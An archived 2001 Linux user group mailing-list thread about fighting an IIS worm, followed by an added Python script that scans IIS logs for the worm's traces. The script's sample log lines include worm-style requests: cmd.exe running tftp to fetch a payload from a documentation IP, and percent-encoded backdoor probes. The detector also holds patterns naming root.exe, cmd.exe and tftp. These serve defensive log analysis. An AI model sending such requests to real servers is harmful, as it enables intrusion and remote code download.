[TriLUG] Battling new IIS worm - appreciate ANY help!
Tue, 18 Sep 2001 14:33:13 -0400
This is a *nasty one*...
I am current on all my patches! This bug is a new one though, and must use
a new exploit. Fortunately, you can lock down Win2000 enough that this
particular worm can't get access to the system directories (at least not
yet!). Our only problems have been with installs of IIS on NT.
The bug is well written. It doesn't show itself until there is traffic on
the site, so you can think you've cleaned it off but as soon as you get a
few hits, it lights up and takes over again! It took us three tries to nuke
it. I think I got it clean on the second try, but re-infection was very
fast. The "tftp" fix seems to have stalled that for now.
As an aside, the marketing folks are finally publishing to the new webserver
I built for them two weeks ago. An apache server, running on Linux...
----- Original Message -----
From: "Mike Johnson" <email@example.com>
Sent: Tuesday, September 18, 2001 1:08 PM
Subject: Re: [TriLUG] Battling new IIS worm - appreciate ANY help!
> Jon Carnes [firstname.lastname@example.org] wrote:
> > Yah, it's off topic...
> You'll want to check the Incidents lists at SecurityFocus.
> Well, details seem to still be coming in. This one is a nifty little
> hybrid that spreads via e-mail and by attacking systems directly.
> It uses obfuscation to try and hide from IDS, and tries to access
> the root.exe and cmd.exe left behind by CodeRedII.
> Cute, no?
> One more time: if you are going to run IIS, you better stay
> on top of patches. If you are going to run Outlook, you better
> stay on top of patches. If you are going to run IE, you better
> stay on top of patches (the worm uploads code to the compromised
> web servers which will cause anyone using IE to be at risk
> when they visit the website). If you are going to run Windows,
> you better stay on top of patches (just threw that one in for
> good measure).
> Never trust a man who puts anything other than a finger up his nose. -
> TriLUG mailing list
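The reply above says the worm probes for the root.exe and cmd.exe copies left behind by CodeRedII, obfuscates its requests to slip past IDS, and pulls its payload with tftp. The following is an added example, not code from the thread or from any TriLUG member, showing how a defender could sweep IIS W3C extended logs for exactly those indicators. The log lines are constructed samples; the field layout (the `#Fields:` header) is assumed to match a default IIS 5.0 W3C configuration, and the directory names in the sample URIs are made up.

```python
import posixpath
from urllib.parse import unquote

# Constructed IIS W3C extended log lines (made up for this example; not from the post).
SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 5.0
#Fields: date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
2001-09-18 14:01:02 192.0.2.10 GET /default.htm - 200
2001-09-18 14:01:05 192.0.2.44 GET /scripts/root.exe /c+dir 200
2001-09-18 14:01:06 192.0.2.44 GET /msadc/cmd.exe /c+tftp+-i+192.0.2.44+GET+payload.exe 200
2001-09-18 14:01:09 192.0.2.44 GET /scripts/r%6fot%2eexe /c+dir 200
2001-09-18 14:01:11 192.0.2.44 GET /scripts/%2525%36%33md.exe /c+dir 404
2001-09-18 14:01:12 192.0.2.10 GET /images/logo.gif - 200
"""

# File names the reply says the worm looks for (left behind by CodeRedII).
BACKDOOR_NAMES = {"root.exe", "cmd.exe"}


def parse_w3c(text):
    """Parse W3C extended log text into dicts keyed by the names in the #Fields line."""
    fields, rows = None, []
    for line in text.splitlines():
        if not line.strip():
            continue
        if line.startswith("#Fields:"):
            fields = line.split(":", 1)[1].split()
            continue
        if line.startswith("#") or fields is None:
            continue  # other directives, or data before any #Fields header
        parts = line.split()
        if len(parts) != len(fields):
            continue  # malformed row; skip rather than mis-align columns
        rows.append(dict(zip(fields, parts)))
    return rows


def normalize_uri(uri, max_rounds=4):
    """Percent-decode until stable (defeats double encoding), then canonicalize the path."""
    decoded = uri
    for _ in range(max_rounds):
        nxt = unquote(decoded)
        if nxt == decoded:
            break
        decoded = nxt
    return posixpath.normpath(decoded.replace("\\", "/").lower())


def classify(row):
    """Return indicator tags for one log row; an empty list means nothing of note."""
    tags = []
    stem = row.get("cs-uri-stem", "")
    query = row.get("cs-uri-query", "")
    canon = normalize_uri(stem)
    raw_canon = posixpath.normpath(stem.replace("\\", "/").lower())
    if posixpath.basename(canon) in BACKDOOR_NAMES:
        tags.append("backdoor_exe")      # request for a CodeRedII leftover
    if canon != raw_canon:
        tags.append("encoded_uri")       # percent-encoding hid the real target
    if "tftp" in unquote(query).lower():
        tags.append("tftp_fetch")        # payload download attempt via tftp
    return tags


def find_hits(text):
    """Every row carrying at least one indicator, as (client ip, canonical uri, tags)."""
    hits = []
    for row in parse_w3c(text):
        tags = classify(row)
        if tags:
            hits.append((row["c-ip"], normalize_uri(row["cs-uri-stem"]), tags))
    return hits


def hits_by_ip(text):
    """Count flagged requests per source address, to spot the scanning hosts."""
    counts = {}
    for ip, _, _ in find_hits(text):
        counts[ip] = counts.get(ip, 0) + 1
    return counts


if __name__ == "__main__":
    for ip, uri, tags in find_hits(SAMPLE_LOG):
        print(f"{ip}  {uri}  {','.join(tags)}")
    print("flagged requests per source:", hits_by_ip(SAMPLE_LOG))
```

Decoding the URI repeatedly before matching is the point of the example: a single `unquote` would leave the doubly encoded request in the sample looking like an innocuous miss, while the normalized path shows it was aimed at cmd.exe. Matching on the tftp keyword in the query is the log-side counterpart of the "tftp fix" mentioned in the post, since blocking tftp stops the fetch but the request attempt still lands in the web log.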